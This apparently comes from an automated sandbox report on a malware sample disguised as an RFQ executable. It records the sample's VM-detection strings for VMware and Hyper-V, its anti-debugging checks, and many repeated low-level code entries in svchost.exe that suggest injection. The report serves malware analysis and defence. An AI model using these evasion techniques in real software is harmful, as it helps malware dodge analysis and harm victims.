          Source: explorer.exe, 00000003.00000002.3879471360.0000000007058000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Be8M
          Source: explorer.exe, 00000003.00000002.3879471360.0000000007058000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000003.00000002.3881532572.000000000888E000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: 2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}=
          Source: explorer.exe, 00000003.00000002.3882013964.0000000008979000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00`
          Source: explorer.exe, 00000003.00000003.3086041137.00000000087C0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NXTVMWare
          Source: explorer.exe, 00000003.00000002.3879471360.0000000007058000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}ata\Af7Nc
          Source: explorer.exe, 00000003.00000003.3086041137.0000000008796000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1438602211.0000000008796000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3881532572.0000000008796000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWe
          Source: explorer.exe, 00000003.00000002.3881532572.0000000008685000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3881532572.00000000087C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1438602211.00000000087C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3086041137.00000000087C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1438602211.0000000008685000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3086041137.0000000008685000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: explorer.exe, 00000003.00000000.1434848584.0000000000A44000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000^F1O
          Source: explorer.exe, 00000003.00000003.3086041137.00000000087C0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000d
          Source: explorer.exe, 00000003.00000000.1438602211.00000000088E6000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
          Source: explorer.exe, 00000003.00000000.1438602211.00000000088E6000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}l
          Source: explorer.exe, 00000003.00000000.1434848584.0000000000A44000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
          Source: explorer.exe, 00000003.00000000.1438602211.00000000088E6000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000003.00000000.1438602211.00000000088E6000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000
          Source: explorer.exe, 00000003.00000000.1434848584.0000000000A44000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exeAPI call chain: ExitProcess graph end nodegraph_1-98274
          Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\systray.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00409AA0 rdtsc 2_2_00409AA0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040ACE0 LdrLoadDll,2_2_0040ACE0
          Source: C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exeCode function: 1_2_001541FD BlockInput,1_2_001541FD
          Source: C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exeCode function: 1_2_000E3B4C GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,1_2_000E3B4C
          Source: C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exeCode function: 1_2_00115CCC EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,1_2_00115CCC
          Source: C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exeCode function: 1_2_0015C304 LoadLibraryA,GetProcAddress,1_2_0015C304
          Source: C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exeCode function: 1_2_00EF34C0 mov eax, dword ptr fs:[00000030h]1_2_00EF34C0
          Source: C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exeCode function: 1_2_00EF3520 mov eax, dword ptr fs:[00000030h]1_2_00EF3520
          Source: C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exeCode function: 1_2_00EF1E70 mov eax, dword ptr fs:[00000030h]1_2_00EF1E70
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306A30B mov eax, dword ptr fs:[00000030h]2_2_0306A30B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306A30B mov eax, dword ptr fs:[00000030h]2_2_0306A30B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306A30B mov eax, dword ptr fs:[00000030h]2_2_0306A30B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302C310 mov ecx, dword ptr fs:[00000030h]2_2_0302C310
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03050310 mov ecx, dword ptr fs:[00000030h]2_2_03050310
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03108324 mov eax, dword ptr fs:[00000030h]2_2_03108324
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03108324 mov ecx, dword ptr fs:[00000030h]2_2_03108324
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03108324 mov eax, dword ptr fs:[00000030h]2_2_03108324
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03108324 mov eax, dword ptr fs:[00000030h]2_2_03108324
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h]2_2_030B2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h]2_2_030B2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h]2_2_030B2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h]2_2_030B2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h]2_2_030B2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h]2_2_030B2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h]2_2_030B2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h]2_2_030B2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h]2_2_030B2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h]2_2_030B2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h]2_2_030B2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h]2_2_030B2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h]2_2_030B2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h]2_2_030B2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h]2_2_030B2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B035C mov eax, dword ptr fs:[00000030h]2_2_030B035C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B035C mov eax, dword ptr fs:[00000030h]2_2_030B035C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B035C mov eax, dword ptr fs:[00000030h]2_2_030B035C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B035C mov ecx, dword ptr fs:[00000030h]2_2_030B035C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B035C mov eax, dword ptr fs:[00000030h]2_2_030B035C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B035C mov eax, dword ptr fs:[00000030h]2_2_030B035C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030FA352 mov eax, dword ptr fs:[00000030h]2_2_030FA352
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D8350 mov ecx, dword ptr fs:[00000030h]2_2_030D8350
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0310634F mov eax, dword ptr fs:[00000030h]2_2_0310634F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D437C mov eax, dword ptr fs:[00000030h]2_2_030D437C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302E388 mov eax, dword ptr fs:[00000030h]2_2_0302E388
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302E388 mov eax, dword ptr fs:[00000030h]2_2_0302E388
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302E388 mov eax, dword ptr fs:[00000030h]2_2_0302E388
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305438F mov eax, dword ptr fs:[00000030h]2_2_0305438F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305438F mov eax, dword ptr fs:[00000030h]2_2_0305438F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03028397 mov eax, dword ptr fs:[00000030h]2_2_03028397
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03028397 mov eax, dword ptr fs:[00000030h]2_2_03028397
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03028397 mov eax, dword ptr fs:[00000030h]2_2_03028397
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030EC3CD mov eax, dword ptr fs:[00000030h]2_2_030EC3CD
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303A3C0 mov eax, dword ptr fs:[00000030h]2_2_0303A3C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303A3C0 mov eax, dword ptr fs:[00000030h]2_2_0303A3C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303A3C0 mov eax, dword ptr fs:[00000030h]2_2_0303A3C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303A3C0 mov eax, dword ptr fs:[00000030h]2_2_0303A3C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303A3C0 mov eax, dword ptr fs:[00000030h]2_2_0303A3C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303A3C0 mov eax, dword ptr fs:[00000030h]2_2_0303A3C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030383C0 mov eax, dword ptr fs:[00000030h]2_2_030383C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030383C0 mov eax, dword ptr fs:[00000030h]2_2_030383C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030383C0 mov eax, dword ptr fs:[00000030h]2_2_030383C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030383C0 mov eax, dword ptr fs:[00000030h]2_2_030383C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B63C0 mov eax, dword ptr fs:[00000030h]2_2_030B63C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DE3DB mov eax, dword ptr fs:[00000030h]2_2_030DE3DB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DE3DB mov eax, dword ptr fs:[00000030h]2_2_030DE3DB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DE3DB mov ecx, dword ptr fs:[00000030h]2_2_030DE3DB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DE3DB mov eax, dword ptr fs:[00000030h]2_2_030DE3DB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D43D4 mov eax, dword ptr fs:[00000030h]2_2_030D43D4
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D43D4 mov eax, dword ptr fs:[00000030h]2_2_030D43D4
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030403E9 mov eax, dword ptr fs:[00000030h]2_2_030403E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030403E9 mov eax, dword ptr fs:[00000030h]2_2_030403E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030403E9 mov eax, dword ptr fs:[00000030h]2_2_030403E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030403E9 mov eax, dword ptr fs:[00000030h]2_2_030403E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030403E9 mov eax, dword ptr fs:[00000030h]2_2_030403E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030403E9 mov eax, dword ptr fs:[00000030h]2_2_030403E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030403E9 mov eax, dword ptr fs:[00000030h]2_2_030403E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030403E9 mov eax, dword ptr fs:[00000030h]2_2_030403E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304E3F0 mov eax, dword ptr fs:[00000030h]2_2_0304E3F0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304E3F0 mov eax, dword ptr fs:[00000030h]2_2_0304E3F0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304E3F0 mov eax, dword ptr fs:[00000030h]2_2_0304E3F0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030663FF mov eax, dword ptr fs:[00000030h]2_2_030663FF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302823B mov eax, dword ptr fs:[00000030h]2_2_0302823B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B8243 mov eax, dword ptr fs:[00000030h]2_2_030B8243
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B8243 mov ecx, dword ptr fs:[00000030h]2_2_030B8243
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0310625D mov eax, dword ptr fs:[00000030h]2_2_0310625D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302A250 mov eax, dword ptr fs:[00000030h]2_2_0302A250
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03036259 mov eax, dword ptr fs:[00000030h]2_2_03036259
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030EA250 mov eax, dword ptr fs:[00000030h]2_2_030EA250
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030EA250 mov eax, dword ptr fs:[00000030h]2_2_030EA250
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03034260 mov eax, dword ptr fs:[00000030h]2_2_03034260
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03034260 mov eax, dword ptr fs:[00000030h]2_2_03034260
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03034260 mov eax, dword ptr fs:[00000030h]2_2_03034260
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302826B mov eax, dword ptr fs:[00000030h]2_2_0302826B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h]2_2_030E0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h]2_2_030E0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h]2_2_030E0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h]2_2_030E0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h]2_2_030E0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h]2_2_030E0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h]2_2_030E0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h]2_2_030E0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h]2_2_030E0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h]2_2_030E0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h]2_2_030E0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h]2_2_030E0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306E284 mov eax, dword ptr fs:[00000030h]2_2_0306E284
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306E284 mov eax, dword ptr fs:[00000030h]2_2_0306E284
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B0283 mov eax, dword ptr fs:[00000030h]2_2_030B0283
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B0283 mov eax, dword ptr fs:[00000030h]2_2_030B0283
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B0283 mov eax, dword ptr fs:[00000030h]2_2_030B0283
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030402A0 mov eax, dword ptr fs:[00000030h]2_2_030402A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030402A0 mov eax, dword ptr fs:[00000030h]2_2_030402A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C62A0 mov eax, dword ptr fs:[00000030h]2_2_030C62A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C62A0 mov ecx, dword ptr fs:[00000030h]2_2_030C62A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C62A0 mov eax, dword ptr fs:[00000030h]2_2_030C62A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C62A0 mov eax, dword ptr fs:[00000030h]2_2_030C62A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C62A0 mov eax, dword ptr fs:[00000030h]2_2_030C62A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C62A0 mov eax, dword ptr fs:[00000030h]2_2_030C62A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303A2C3 mov eax, dword ptr fs:[00000030h]2_2_0303A2C3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303A2C3 mov eax, dword ptr fs:[00000030h]2_2_0303A2C3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303A2C3 mov eax, dword ptr fs:[00000030h]2_2_0303A2C3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303A2C3 mov eax, dword ptr fs:[00000030h]2_2_0303A2C3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303A2C3 mov eax, dword ptr fs:[00000030h]2_2_0303A2C3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031062D6 mov eax, dword ptr fs:[00000030h]2_2_031062D6
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030402E1 mov eax, dword ptr fs:[00000030h]2_2_030402E1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030402E1 mov eax, dword ptr fs:[00000030h]2_2_030402E1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030402E1 mov eax, dword ptr fs:[00000030h]2_2_030402E1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DE10E mov eax, dword ptr fs:[00000030h]2_2_030DE10E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DE10E mov ecx, dword ptr fs:[00000030h]2_2_030DE10E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DE10E mov eax, dword ptr fs:[00000030h]2_2_030DE10E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DE10E mov eax, dword ptr fs:[00000030h]2_2_030DE10E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DE10E mov ecx, dword ptr fs:[00000030h]2_2_030DE10E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DE10E mov eax, dword ptr fs:[00000030h]2_2_030DE10E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DE10E mov eax, dword ptr fs:[00000030h]2_2_030DE10E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DE10E mov ecx, dword ptr fs:[00000030h]2_2_030DE10E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DE10E mov eax, dword ptr fs:[00000030h]2_2_030DE10E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DE10E mov ecx, dword ptr fs:[00000030h]2_2_030DE10E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DA118 mov ecx, dword ptr fs:[00000030h]2_2_030DA118
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DA118 mov eax, dword ptr fs:[00000030h]2_2_030DA118
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DA118 mov eax, dword ptr fs:[00000030h]2_2_030DA118
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DA118 mov eax, dword ptr fs:[00000030h]2_2_030DA118
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F0115 mov eax, dword ptr fs:[00000030h]2_2_030F0115
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03060124 mov eax, dword ptr fs:[00000030h]2_2_03060124
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C4144 mov eax, dword ptr fs:[00000030h]2_2_030C4144
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C4144 mov eax, dword ptr fs:[00000030h]2_2_030C4144
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C4144 mov ecx, dword ptr fs:[00000030h]2_2_030C4144
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C4144 mov eax, dword ptr fs:[00000030h]2_2_030C4144
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C4144 mov eax, dword ptr fs:[00000030h]2_2_030C4144
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302C156 mov eax, dword ptr fs:[00000030h]2_2_0302C156
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C8158 mov eax, dword ptr fs:[00000030h]2_2_030C8158
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03036154 mov eax, dword ptr fs:[00000030h]2_2_03036154
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03036154 mov eax, dword ptr fs:[00000030h]2_2_03036154
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03104164 mov eax, dword ptr fs:[00000030h]2_2_03104164
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03104164 mov eax, dword ptr fs:[00000030h]2_2_03104164
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03070185 mov eax, dword ptr fs:[00000030h]2_2_03070185
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030EC188 mov eax, dword ptr fs:[00000030h]2_2_030EC188
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030EC188 mov eax, dword ptr fs:[00000030h]2_2_030EC188
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D4180 mov eax, dword ptr fs:[00000030h]2_2_030D4180
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D4180 mov eax, dword ptr fs:[00000030h]2_2_030D4180
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B019F mov eax, dword ptr fs:[00000030h]2_2_030B019F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B019F mov eax, dword ptr fs:[00000030h]2_2_030B019F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B019F mov eax, dword ptr fs:[00000030h]2_2_030B019F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B019F mov eax, dword ptr fs:[00000030h]2_2_030B019F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302A197 mov eax, dword ptr fs:[00000030h]2_2_0302A197
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302A197 mov eax, dword ptr fs:[00000030h]2_2_0302A197
